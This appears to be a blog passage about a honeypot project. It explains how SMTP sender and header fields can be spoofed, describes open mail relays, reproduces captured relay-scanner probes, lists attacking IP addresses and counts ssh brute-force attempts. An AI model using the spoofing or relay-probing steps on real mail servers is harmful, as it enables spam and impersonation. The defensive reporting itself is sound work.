Continuing with explanation of SMTP: now, if we want to send an e-mail, we must start with MAIL FROM: and the the e-mail address of the sender, between brackets. In the example below I do not use brackets because of HTML, but in SMTP server you will need.

C: MAIL FROM: from@domain.com
S: 250 from@domain.com... Sender ok


This command tells the server that a new mail is starting to be done, and the server reset all its state tables and buffers, from previous e-mails. If SMTP accept then it return the code 250. SMTP do a validation here, to verify is the person who is using the service can send mail’s using e-mail address from@domain.com.

Now the e-mail client can give the address of the recipient of the message. The command to perform this action, RCPT TO:

C: RCPT TO: to@domain.com
S: 250 to@domain.com... Recipient ok (will queue)


The server will save the mail locally, and we are ready to write the body of our e-mail.
To start writing the message we hit:

C: DATA
S: 354 Start mail input; end with CRLF.CRLF
C: From: from@domain.com
C: To: realTO@domain.com
C: Subject: BC_82.155.126.2
C: Date: Sun, 07 Dec 08 19:24:09 GMT
C: Hello, I'm a spammer!


Yes, in fact you can put a completely different e-mail and name from the one you put in RCPT TO.
When the message is finished, you hit CRLF.CRLF and you are done, the e-mail will be added to the queue, and will be sent.

The problem begins when the SMTP server don’t verify the command FROM parameter, that is what is called an Open Mail Relay.

Open Relay Scanners

The SMTP servers support a lot of configurations, just like other servers. We say that an open mail relay is an SMTP server configuration that allow anyone on the Internet to send e-mail. This e-mails could be sent to known and not known users from the system. This used to be the default configuration of SMTP servers. With the emergence of spammers these systems began to appear on blacklists of other servers.
But the truth is that until today, some SMTP servers are configured this way. Allowing spreading of spamm and worms. Then you have John Gilmore who run a Open mail relay since the 90’s, and is blacklisted in a lot of servers.

We have find a lot of hit’s from open relay scanners in our honeypot:

HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223


We found also that all the open mail relay attacks where from cities in Taiwan, this country seems to have a big activity on what concerns to spamm, like ProjectHoneyPot page shows:

118.165.91.55 - Taipei
219.86.32.1 - Hualien
124.11.193.219 - Taipei
124.11.192.173 - Taipei
114.44.42.34 - Taipei
114.44.43.87 - Taipei


I have checked, and all of them are blacklisted in international DNSBLs.
By the way, all of them use Windows XP SP1, if that matters…

With an open mail relay machine active, spammers can send a lot of spamm throw that machine to their targets, distributing the cost of sending spamm to various computers.

Future Work

For now that’s all the stuff we find in our honeypot logs related to the SMTP server.
Stay tuned, for further news.

11 01 2009

Back with honeypot news! We have launched our honeypot for 5 weeks, and now we have results to show you. In this post I will show you the attempts that attackers make to get into our ssh honeypot server.

The ssh honeypot was fustigated during these 5 weeks. Several attempts were made, about 78227, but no one successful.

Here is the graphic for usernames attempts:

And here is the graphic for password attempts:

Future Work

We will show all the rest of information that we capture on our honeypot in the future. We have discovered great stuff.
I have also done a nice program to generate statistics in Haskell using HaskellCharts, I will talk about that later too.

That’s all for now!